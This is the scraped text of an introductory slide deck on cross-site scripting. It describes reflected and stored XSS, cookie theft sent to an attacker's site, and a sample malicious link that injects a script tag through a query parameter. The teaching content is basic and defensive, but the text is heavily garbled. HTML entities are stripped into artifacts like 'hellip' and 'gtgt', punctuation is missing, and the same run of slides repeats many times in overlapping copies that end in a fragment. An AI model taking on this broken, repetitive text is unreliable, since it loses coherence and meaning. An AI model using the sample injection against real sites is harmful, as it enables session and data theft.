1

Internet a great source for every workhellip

In which for every work there is a different site

Earlier these sites were statichellip ie just

the paragraphs and text fileshellipwhich was a huge task to read hellip

But today the Websites are more complex than ever containing a lot of graphic and dynamic content making the experience for the user more enjoyable

2

Dynamic content

gtgt Imagesgtgt Musicgtgt Different Styled Textgtgt Advertisements

And many more helliphelliphellip

3

WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip

4

Cross Site Scripting

XSS

5

It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to

recognize ithellip amp this injected code is called XSS Holehellip

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

2

Dynamic content

gtgt Imagesgtgt Musicgtgt Different Styled Textgtgt Advertisements

And many more helliphelliphellip

3

WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip

4

Cross Site Scripting

XSS

5

It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to

recognize ithellip amp this injected code is called XSS Holehellip

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

3

WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip

4

Cross Site Scripting

XSS

5

It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to

recognize ithellip amp this injected code is called XSS Holehellip

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

4

Cross Site Scripting

XSS

5

It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to

recognize ithellip amp this injected code is called XSS Holehellip

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

5

It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to

recognize ithellip amp this injected code is called XSS Holehellip

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

